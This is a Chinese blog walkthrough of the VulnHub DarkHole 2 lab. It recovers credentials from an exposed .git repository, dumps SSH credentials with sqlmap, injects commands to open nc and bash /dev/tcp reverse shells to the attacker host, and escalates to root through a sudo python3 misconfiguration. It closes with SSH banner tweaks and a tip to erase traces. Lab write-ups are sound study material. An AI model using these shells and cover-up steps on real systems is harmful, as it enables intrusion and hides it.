



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="X_T" href="http://n1h1l157.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="X_T" href="http://n1h1l157.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="X_T" href="http://n1h1l157.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="VULNHUB 41-50" />


<link rel="canonical" href="http://n1h1l157.github.io/2023/07/01/VULNHUB/142%20DARKHOLE2/">



  <title>
VULNHUB DARKHOLE2 - VULNHUB |
Phut Hon = X_T = 天行健，君子以自强不息</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">VULNHUB DARKHOLE2
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-07-01 00:00:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-07-01T00:00:00+08:00">2023-07-01</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>5.5k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>9 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Phut Hon</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/dQzT6Ao9rVLb1Zc.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/AG1hjZYM3aSKz6H.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/x6dgpGLH7auh2Sy.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/KopmzJq4geNSalr.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/NAc3EBhzxTbRiuQ.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/X8mSzsruevjtc9f.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/VULNHUB/" itemprop="item" rel="index" title="分类于 VULNHUB"><span itemprop="name">VULNHUB</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://n1h1l157.github.io/2023/07/01/VULNHUB/142%20DARKHOLE2/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content=".N1h1l157">
    <meta itemprop="description" content="天行健，君子以自强不息, 人生如逆旅，我亦是行人">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="X_T">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>靶机下载地址: <span class="exturl" data-url="aHR0cHM6Ly93d3cudnVsbmh1Yi5jb20vZW50cnkvZGFya2hvbGUtMiw3NDAv">https://www.vulnhub.com/entry/darkhole-2,740/</span><br>
 教程链接地址: <span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vd2RkLWJsb2cvcC8xNTIzMDgyNi5odG1s">https://www.cnblogs.com/wdd-blog/p/15230826.html</span></p>
<h3 id="001-确认攻击目标的财产信息"><a class="markdownIt-Anchor" href="#001-确认攻击目标的财产信息">#</a> 001 确认攻击目标的财产信息</h3>
<p>攻击机 kali： 1 92.168.31.xx (由于设置成了 DHCP、可能多变)<br>
 靶机 CENGBOX 3 ：桥接于 1 92.168.31.1 的网卡，ip 未知</p>
<p>1 ）确定靶机 ip 地址和开放的端口<br>
由已至内网靶机所在主机 MAC 地址自动扫描靶机服务<br>
 sudo arp-scan -l | grep ‘a0’ | awk ‘{print $1,$2}’ | cut -d ’ ’ -f 1 | xargs sudo nmap -PA</p>
<h3 id="再次对其开放的端口进行详细的扫描"><a class="markdownIt-Anchor" href="#再次对其开放的端口进行详细的扫描">#</a> 再次对其开放的端口进行详细的扫描</h3>
<p>sudo nmap -A -p- 192.168.31.12 --min-rate=5000</p>
<p>à 靶机 ip：192.168.31. 12 、靶机开放端口 22 , 80<br>
 并且扫描到了再 80 端口上是存在 git 源码泄漏的</p>
<h3 id="002-信息收集git源码泄漏利用git-log切换git分支"><a class="markdownIt-Anchor" href="#002-信息收集git源码泄漏利用git-log切换git分支">#</a> 002 信息收集，.git 源码泄漏利用，git log 切换 git 分支</h3>
<p>打开 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 12 / 进行信息收集</p>
<p>目测是没有什么有价值的信息，直接开始用 gobuster 扫描目录<br>
 gobuster dir -x php,txt,html,zip,rar,jpg,png -w /usr/share/wordlists/dirbuster/directory-<br>
list-2.3-medium.txt -u <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 12</p>
<h3 id="依次对得到的目录信息进行访问搜索有价值的信息"><a class="markdownIt-Anchor" href="#依次对得到的目录信息进行访问搜索有价值的信息">#</a> 依次对得到的目录信息进行访问搜索有价值的信息</h3>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvbG9naW4ucGhw">http://192.168.31.12/login.php</span></p>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvZGFzaGJvYXJkLnBocA==">http://192.168.31.12/dashboard.php</span></p>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvY29uZmlnLw==">http://192.168.31.12/config/</span></p>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvY29uZmlnL2NvbmZpZy5waHA=">http://192.168.31.12/config/config.php</span></p>
<p>通过对上述几个目录的信息收集，只能确定一个后台的登陆地址 login.php，<br>
和一个不被允许进入的 dashboard.php 两个信息</p>
<p>在端口扫描阶段因为有.git 的信息，对.git 进行访问<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvLmdpdC8="> http://192.168.31.12/.git/</span></p>
<p>利用 githack 对源码泄漏进行利用</p>
<p>wget <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2xpamllamllL0dpdEhhY2svYXJjaGl2ZS9yZWZzL2hlYWRzL21hc3Rlci56aXA=">https://github.com/lijiejie/GitHack/archive/refs/heads/master.zip</span> - O Githack.zip</p>
<ul>
<li>q;unzip -q Githack.zip;cd GitHack-master;<br>
python3 <span class="exturl" data-url="aHR0cDovL0dpdEhhY2sucHk=">GitHack.py</span> <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvLmdpdA==">http://192.168.31.12/.git</span></li>
</ul>
<p>通过.git 文件可以得到此项目的源码</p>
<p>源码中有 config 是敏感文件，进行读取</p>
<p>得到了数据的账户密码 root:darkhole_2</p>
<p>但是通过 githack 的方式读取到的源码没有记录之前的 git 版本，没法使用 git 命<br>
令去获取到之前提交的版本，除了 githack 的利用方式之外还可以用如下方式<br>
 TF=$(mktemp -d); cd $TF;wget -r <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTIvLmdpdC8=">http://192.168.31.12/.git/</span> - q;cd $TF/192.168.31.12<br>
&amp;&amp; git clone. webapp &amp;&amp; cd webapp</p>
<p>通过这种方式可以得到.git 文件，执行 git 的相关命令</p>
<p>git log 查看之前提交的版本<br>
看到有一次提交信息是涉及到 login.php 的，切换到该分支查看<br>
 git reset --hard a4d900a8d85e8938d3601f3cef113ee293028e10</p>
<p>在 login.php 内容中看到了用户名和密码 lush@admin.com:321</p>
<h3 id="003-sql注入拿数据-sqlmap一把梭-敏感端口查看"><a class="markdownIt-Anchor" href="#003-sql注入拿数据-sqlmap一把梭-敏感端口查看">#</a> 003 sql 注入拿数据、sqlmap 一把梭、敏感端口查看</h3>
<h3 id="通过得到的用户名和密码进入到了对方后台管理中心"><a class="markdownIt-Anchor" href="#通过得到的用户名和密码进入到了对方后台管理中心">#</a> 通过得到的用户名和密码进入到了对方后台管理中心</h3>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuOTQvZGFzaGJvYXJkLnBocD9pZD0x">http://192.168.31.94/dashboard.php?id=1</span><br>
 观察 url 地址，似乎是存在 sql 注入的，通过 burp 截取数据包</p>
<p>sqlmap -r 1.txt --dbs --batch</p>
<p>跑出来了数据库的名字 darkhole_2，继续测试数据库中有哪些表<br>
 sqlmap -r 1.txt --dbs --batch - D darkhole_2 --tables</p>
<p>得到两张表，选取 ssh 表去查看有哪些列<br>
 sqlmap -r 1.txt --dbs --batch - D darkhole_2 -T ssh --columns</p>
<p>得到此表下的三个字段 user、id、pass<br>
sqlmap -r 1.txt --batch -D darkhole_2 -T ssh -C user,id,pass --dump</p>
<p>最终得到了数据库的用户名和密码 jehad:fool</p>
<p>凭借凭据 jehad 拿到了靶机上一个普通用户的权限</p>
<p>但是这个 ssh 登陆成功之后显示的东西是比较多的，这么多的系统信息显示出<br>
来是没必要的，而且会有 last login 可以看到最后登陆的 ip，这些信息也是可以<br>
处理的，后面会对这个信息进行自定义</p>
<p>查看靶机上有没有开放特殊的端口</p>
<h3 id="004-curl访问网站及命令注入-bash的base-64-反弹shell"><a class="markdownIt-Anchor" href="#004-curl访问网站及命令注入-bash的base-64-反弹shell">#</a> 004 curl 访问网站及命令注入、bash 的 base 64 反弹 shell</h3>
<h3 id="发现在这台服务器上有-9999-端口正在运行但是此端口被防火墙关掉了我们"><a class="markdownIt-Anchor" href="#发现在这台服务器上有-9999-端口正在运行但是此端口被防火墙关掉了我们">#</a> 发现在这台服务器上有 9999 端口正在运行，但是此端口被防火墙关掉了，我们</h3>
<p>在 kali 机器上无法访问此端口，可以做 ssh 端口转发将此端口映射到外面，当<br>
然也可以通过 curl 命令在这台 linux 机器上直接访问此网站</p>
<p>curl -vv 127.0.0.1:9999<br>
 可以看到所提交的数据包以及返回的数据包，并且可以看到页面是采用的 php<br>
 写的，返回了一个 cmd 的参数，很有可能是命令执行漏洞</p>
<h3 id="执行系统命令看当前这个网站是属于哪个用户下的"><a class="markdownIt-Anchor" href="#执行系统命令看当前这个网站是属于哪个用户下的">#</a> 执行系统命令，看当前这个网站是属于哪个用户下的</h3>
<p>curl 127.0.0.1:9999?cmd=id;echo ’ ’<br>
echo ’ ' 的作用使回显比较美观一些，没有实际的作用<br>
得到了此网站是由用户 losy 的权限搞的，现在需要把 losy 用户的 shell 反弹<br>
判断 losy 是否可以使用 nc 命令反弹 shell<br>
curl 127.0.0.1:9999?cmd=which%20nc;echo ’ ’</p>
<p>使用 nc 反弹 shell，并在 kali 上进行监听<br>
 curl 127.0.0.1:9999?cmd=nc%20192.168.31.99%204444%20-e%20/bin/bash;echo ‘’</p>
<p>反弹失败了，有可能是因为被禁用了 nc、也有可能是未采用 base 64 编码，需要<br>
都进行尝试一番，使用 bash 反弹 shell 时的命令执行成功了</p>
<p>curl 127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-<br>
i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.31.99%2F4444%200%3E%261%27<br>
 采用的命令即是：bash -c ‘bash -i &gt;&amp; /dev/tcp/192.168.31. 99 /4444 0&gt;&amp;1’</p>
<p>调整为一个标准的 tty 终端<br>
 python3 -c “import pty;pty.spawn (’/bin/bash’)”<br>
python3 -c “<strong>import</strong>(‘pty’).spawn(’/bin/bash’)”<br>
stty -a<br>
stty raw -echo;fg</p>
<p>调整 TERM、stty 的窗口大小<br>
 export TERM=xterm<br>
stty rows 31 columns 118</p>
<p>此刻的我们已经拿到了 losy 用户的 shell</p>
<h3 id="005-pspy监控-历史遗留信息-权限错误提权"><a class="markdownIt-Anchor" href="#005-pspy监控-历史遗留信息-权限错误提权">#</a> 005 pspy 监控、历史遗留信息、权限错误提权</h3>
<p>在 kali 上给靶机传输一个 pspy 看看有没有敏感任务被执行</p>
<p>看到在 /opt/web 下有一个 php 启动本地 9999 端口的命令</p>
<h3 id="由此造成了-9999-端口处的命令执行漏洞"><a class="markdownIt-Anchor" href="#由此造成了-9999-端口处的命令执行漏洞">#</a> 由此造成了 9999 端口处的命令执行漏洞</h3>
<p>到处查看文件，找到了在 bash_history 里边的敏感记录，当中有一个密码<br>
发现这个密码不是 root 用户的，只是 losy 用户的，这个密码也可以爆破得到</p>
<p>通过 sudo - l 查到了一条隐私设置错误的记录<br>
 sudo -u root python3 -c “<strong>import</strong>(‘os’).system(’/bin/bash’)”</p>
<p><strong>提权成功拿到了 root 权限</strong></p>
<h3 id="006-ssh登陆显示信息-登陆前后及系统信息-lastlogin信息"><a class="markdownIt-Anchor" href="#006-ssh登陆显示信息-登陆前后及系统信息-lastlogin信息">#</a> 006 ssh 登陆显示信息、登陆前后及系统信息、lastlogin 信息</h3>
<p>对于 ssh 登陆之后有大量的系统信息展示出来，这在我们看来是完全没有必要<br>
的，而且占用了大量的屏幕不太友好，接下来就自定义 ssh 登陆后的信息</p>
<h3 id="这是默认显示的信息分了两部分上面的是打印的系统信息下面的是最后"><a class="markdownIt-Anchor" href="#这是默认显示的信息分了两部分上面的是打印的系统信息下面的是最后">#</a> 这是默认显示的信息，分了两部分，上面的是打印的系统信息，下面的是最后</h3>
<p>登陆到此服务器的时间和 ip</p>
<p>上边的信息来自来自 /run/motd.dynamic 文件</p>
<h3 id="这个文件的信息无法修改哪怕被清空了也会复原"><a class="markdownIt-Anchor" href="#这个文件的信息无法修改哪怕被清空了也会复原">#</a> 这个文件的信息无法修改，哪怕被清空了也会复原。</h3>
<p>它是由 /etc/update-motd.d/ 下的几个脚本文件来动态生成的。将 /etc/update-<br>
motd.d/ 下的脚本移除或者去掉可执行权限可将此动态生成的系统信息去掉。<br>
chmod -x /etc/update-motd.d/*;echo &gt; /run/motd.dynamic;</p>
<h3 id="反之赋予这个文件夹所有文件可执行权限之后可以显示出系统信息"><a class="markdownIt-Anchor" href="#反之赋予这个文件夹所有文件可执行权限之后可以显示出系统信息">#</a> 反之，赋予这个文件夹所有文件可执行权限之后，可以显示出系统信息</h3>
<p>开启 linux 系统信息展示：chmod +x /etc/update-motd.d/*</p>
<p>下面的这条显示最后登陆信息是由 ssh 控制，ssh 默认是开启此记录的，可修<br>
改 ssh 的配置文件，令其消失不见，关闭最后登陆的日志命令如下：<br>
sed -i ‘s/#PrintLastLog yes/PrintLastLog no/g’ /etc/ssh/sshd_config;systemctl restart<br>
sshd</p>
<h3 id="最后登陆的消息一般来说比较重要可以方便的看到自己的机器是否有异地登"><a class="markdownIt-Anchor" href="#最后登陆的消息一般来说比较重要可以方便的看到自己的机器是否有异地登">#</a> 最后登陆的消息一般来说比较重要，可以方便的看到自己的机器是否有异地登</h3>
<h3 id="陆的情况出现开启最后登陆的日志命令如下"><a class="markdownIt-Anchor" href="#陆的情况出现开启最后登陆的日志命令如下">#</a> 陆的情况出现，开启最后登陆的日志命令如下：</h3>
<p>很多时候我们需要自定义一些登陆后的 logo 展示，可以选在登陆前或者登陆后<br>
显示一些 logo，而 /etc/motd 的作用就是用来登陆之后会显示的内容，可在<br>
<span class="exturl" data-url="aHR0cHM6Ly93d3cuYm9vdHNjaG9vbC5uZXQvYXNjaWklRTQlQjglOEElRTglQkYlOUIlRTglQTElOEMlRTUlQUQlOTclRTYlQUYlOEQlRTclOUElODQlRTUlOUIlQkUlRTUlQkQlQTIlRTclQkMlOTYlRTclQTAlODE="> https://www.bootschool.net/ascii 上进行字母的图形编码</span><br>
开启 linux 登陆 logo 提示：<br>
echo -e ‘\n\n\t\t██╗ ██╗ ████████╗\n\t\t╚██╗██╔╝<br>
╚══██╔══╝\n\t\t ╚███╔╝ ██║ \n\t\t ██╔██<br>
╗ ██║ \n\t\t██╔╝ ██╗███████╗██║ \n\t\t<br>
╚═╝ ╚═╝╚══════╝╚═╝\n’ &gt; /etc/motd</p>
<ul>
<li>e 表示开启转义 \n 表示换行 \t 表示 tab 按键</li>
</ul>
<p>关闭这个 logo 提示，只需要将 /etc/motd 清空就可以<br>
 echo &gt; /etc/motd;vim /etc/motd +&quot;d 1&quot; +wq 会有一个空格<br>
 cat /dev/null &gt; /etc/motd 没有任何东西，直接清空文件</p>
<p>上述命令是用来展示或者不展示在 linux 登陆之后的 logo，还有一种方式是用<br>
来添加在 linux 登陆之前就来展示的 logo，使用 /etc/issue.net 来控制<br>
 sed -i ‘s/#Banner none/Banner/etc/issue.net/g’ /etc/ssh/sshd_config;systemctl restart<br>
sshd; echo -e ‘\n\t\t███████╗██╗ ██╗██╗ ██╗\n\t\t╚══███╔╝╚██╗<br>
██╔╝██║ ██║\n\t\t ███╔╝ ╚████╔╝ ███████║\n\t\t ███╔╝<br>
╚██╔╝ ██╔══██║\n\t\t███████╗ ██║ ██║<br>
██║\n\t\t╚══════╝ ╚═╝ ╚═╝ ╚═╝’ &gt; /etc/issue.net</p>
<p>可以看到这条 logo 信息是在我们输入 root 密码之前就显示出来的，是在登陆<br>
前显示的，/etc/issue.net 的作用就是登陆前显示信息</p>
<p>将登陆后的信息也显示一下进行对比就更容易理解<br>
执行前面的命令，给 /etc/motd 重新打印出来了 X_T 的样式</p>
<p>/etc/issue.net 显示在登陆前，/etc/motd 显示在登陆后</p>
<h3 id="一键关闭登陆前的信息展示"><a class="markdownIt-Anchor" href="#一键关闭登陆前的信息展示">#</a> 一键关闭登陆前的信息展示</h3>
<p>sed -i ‘s/Banner /etc/issue.net/#Banner none/g’ /etc/ssh/sshd_config;systemctl<br>
restart sshd;echo &gt; /etc/issue.net</p>
<h3 id="除了上述几种方式外我们还可以添加自定义的语句到环境变量中登陆到"><a class="markdownIt-Anchor" href="#除了上述几种方式外我们还可以添加自定义的语句到环境变量中登陆到">#</a> 除了上述几种方式外，我们还可以添加自定义的语句到环境变量中，登陆到</h3>
<p>shell 后就会执行，比如在环境变量里边添加<br>
 figlet 表示以一种方式去打印后面跟的字母或者数字<br>
 cat &gt;&gt; ~/.bashrc &lt;&lt; EOF<br>
figlet I’m X_T<br>
EOF<br>
 检查这个文件是否完整的写入到了环境变量里边<br>
 cat ~/.bashrc | tail -n1</p>
<p>vim ~/.bashrcs 删除此条信息则不会在显示这条</p>
<h3 id="如果显示的信息太多了影响视觉有没有办法一键全部删除掉答案是肯定"><a class="markdownIt-Anchor" href="#如果显示的信息太多了影响视觉有没有办法一键全部删除掉答案是肯定">#</a> 如果显示的信息太多了，影响视觉，有没有办法一键全部删除掉，答案是肯定</h3>
<p>的，在每个用户下执行创建.hushlogin 文件，则所有非环境变量里边的信息都<br>
再不会被显示出来<br>
 for USER in  <code>cat /etc/passwd | grep /bin/bash |grep -v root | cut -d &quot;:&quot; -f 1</code>  ;do touch<br>
/home/$USER/.hushlogin;done;touch /root/.hushlogin</p>
<h3 id="一键删除阻碍登陆日志信息输出的文件"><a class="markdownIt-Anchor" href="#一键删除阻碍登陆日志信息输出的文件">#</a> 一键删除阻碍登陆日志信息输出的文件：</h3>
<p>for USER in  <code>cat /etc/passwd | grep /bin/bash |grep -v root | cut -d &quot;:&quot; -f 1</code>  ;do rm -f<br>
/home/$USER/.hushlogin;done;rm -f /root/.hushlogin</p>
<p>根据以上的信息就可以自定义 ssh 登陆的信息自定义的设置，当然最后记得复<br>
原，并且删除自己操作过的痕迹，防止被知道自己操作过什么</p>

      <div class="tags">
          <a href="/tags/VULNHUB-41-50/" rel="tag"><i class="ic i-tag"></i> VULNHUB 41-50</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-03 18:02:28" itemprop="dateModified" datetime="2023-07-03T18:02:28+08:00">2023-07-03</time>
  </span>
  <span id="2023/07/01/VULNHUB/142 DARKHOLE2/" class="item leancloud_visitors" data-flag-title="VULNHUB DARKHOLE2" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt=".N1h1l157 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt=".N1h1l157 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt=".N1h1l157 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>.N1h1l157 <i class="ic i-at"><em>@</em></i>X_T
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://n1h1l157.github.io/2023/07/01/VULNHUB/142%20DARKHOLE2/" title="VULNHUB DARKHOLE2">http://n1h1l157.github.io/2023/07/01/VULNHUB/142 DARKHOLE2/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/07/01/VULNHUB/121%20RIPPER/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;TqxWdE9iAvtYN3n.jpg" title="VULNHUB RIPPER">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB RIPPER</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/07/01/VULNHUB/141%20CENGBOX3/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;bBgiPja8yQ31ZO2.jpg" title="VULNHUB CENGBOX3">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB CENGBOX3</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#001-%E7%A1%AE%E8%AE%A4%E6%94%BB%E5%87%BB%E7%9B%AE%E6%A0%87%E7%9A%84%E8%B4%A2%E4%BA%A7%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text"> 001 确认攻击目标的财产信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%8D%E6%AC%A1%E5%AF%B9%E5%85%B6%E5%BC%80%E6%94%BE%E7%9A%84%E7%AB%AF%E5%8F%A3%E8%BF%9B%E8%A1%8C%E8%AF%A6%E7%BB%86%E7%9A%84%E6%89%AB%E6%8F%8F"><span class="toc-number">2.</span> <span class="toc-text"> 再次对其开放的端口进行详细的扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#002-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86git%E6%BA%90%E7%A0%81%E6%B3%84%E6%BC%8F%E5%88%A9%E7%94%A8git-log%E5%88%87%E6%8D%A2git%E5%88%86%E6%94%AF"><span class="toc-number">3.</span> <span class="toc-text"> 002 信息收集，.git 源码泄漏利用，git log 切换 git 分支</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%9D%E6%AC%A1%E5%AF%B9%E5%BE%97%E5%88%B0%E7%9A%84%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E8%BF%9B%E8%A1%8C%E8%AE%BF%E9%97%AE%E6%90%9C%E7%B4%A2%E6%9C%89%E4%BB%B7%E5%80%BC%E7%9A%84%E4%BF%A1%E6%81%AF"><span class="toc-number">4.</span> <span class="toc-text"> 依次对得到的目录信息进行访问搜索有价值的信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#003-sql%E6%B3%A8%E5%85%A5%E6%8B%BF%E6%95%B0%E6%8D%AE-sqlmap%E4%B8%80%E6%8A%8A%E6%A2%AD-%E6%95%8F%E6%84%9F%E7%AB%AF%E5%8F%A3%E6%9F%A5%E7%9C%8B"><span class="toc-number">5.</span> <span class="toc-text"> 003 sql 注入拿数据、sqlmap 一把梭、敏感端口查看</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E5%BE%97%E5%88%B0%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%E8%BF%9B%E5%85%A5%E5%88%B0%E4%BA%86%E5%AF%B9%E6%96%B9%E5%90%8E%E5%8F%B0%E7%AE%A1%E7%90%86%E4%B8%AD%E5%BF%83"><span class="toc-number">6.</span> <span class="toc-text"> 通过得到的用户名和密码进入到了对方后台管理中心</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#004-curl%E8%AE%BF%E9%97%AE%E7%BD%91%E7%AB%99%E5%8F%8A%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5-bash%E7%9A%84base-64-%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">7.</span> <span class="toc-text"> 004 curl 访问网站及命令注入、bash 的 base 64 反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%91%E7%8E%B0%E5%9C%A8%E8%BF%99%E5%8F%B0%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%9C%89-9999-%E7%AB%AF%E5%8F%A3%E6%AD%A3%E5%9C%A8%E8%BF%90%E8%A1%8C%E4%BD%86%E6%98%AF%E6%AD%A4%E7%AB%AF%E5%8F%A3%E8%A2%AB%E9%98%B2%E7%81%AB%E5%A2%99%E5%85%B3%E6%8E%89%E4%BA%86%E6%88%91%E4%BB%AC"><span class="toc-number">8.</span> <span class="toc-text"> 发现在这台服务器上有 9999 端口正在运行，但是此端口被防火墙关掉了，我们</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E7%9C%8B%E5%BD%93%E5%89%8D%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99%E6%98%AF%E5%B1%9E%E4%BA%8E%E5%93%AA%E4%B8%AA%E7%94%A8%E6%88%B7%E4%B8%8B%E7%9A%84"><span class="toc-number">9.</span> <span class="toc-text"> 执行系统命令，看当前这个网站是属于哪个用户下的</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" 